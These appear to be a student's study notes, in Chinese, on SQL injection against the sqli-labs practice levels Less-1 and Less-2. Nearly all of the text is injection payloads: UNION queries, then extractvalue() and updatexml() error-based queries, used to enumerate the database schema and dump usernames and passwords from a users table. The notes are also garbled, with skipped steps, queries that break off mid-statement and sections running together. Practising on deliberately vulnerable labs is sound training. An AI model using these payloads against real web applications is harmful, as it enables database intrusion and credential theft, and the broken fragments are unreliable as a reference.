sql注入-0629-田靖宇-17130105521

SQL 注入

Less-1

(一) UNION 联合查询

1.判断注入点（存在注入）

?id=1' and 1=1 --+

2.猜字段（字段数：3）

?id=1' order by 3 -- +

3.判断回显点

?id=0' union select 1,2,3 --+

?id=0' union select 1,2,group_concat(column_name) from

information_schema.columns where table_name='users' --+

7.users 表中 username，password 字段值

?id=0' union select 1,2,group_concat(username,':',password) from users --+

(二) extractvalue() 报错注入

1.查询数据库

?id=1' and extractvalue(1,concat(0x7e,(select database()))) --+

2.查询表

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from

information_schema.tables where table_schema=database()))) --+

3.查字段

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from

information_schema.columns where table_name='users'))) --+

4. users 表中 username，password 字段值

?id=1' and extractvalue(1,concat(0x7e,(select

?id=1' and updatexml(1,concat(0x7e,(select database())),1) --+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from

information_schema.columns where table_name='users')),1) --+

4. users 表中 username，password 字段值

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,':',password)

from users)),1) --+

Less-2

(一) UNION 联合查询

1.判断注入点（存在注入）

?id=1 and 1=1 --+

2.猜字段（字段数：3）

3.判断回显点

4.查询数据库（database（））

?id=0 union select 1,2,database() --+

5.查表名

?id=0 union select 1,2,group_concat(table_name) from

information_schema.tables where table_schema=database() --+

6.查字段名

?id=0 union select 1,2,group_concat(column_name) from

?id=1 and extractvalue(1,concat(0x7e,(select database()))) --+

2.查询表

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from

information_schema.tables where table_schema=database()))) --+

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from

?id=1 and extractvalue(1,concat(0x7e,(select

1.查询数据库

?id=1 and updatexml(1,concat(0x7e,(select database())),1) --+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from

information_schema.columns where table_name='users')),1) --+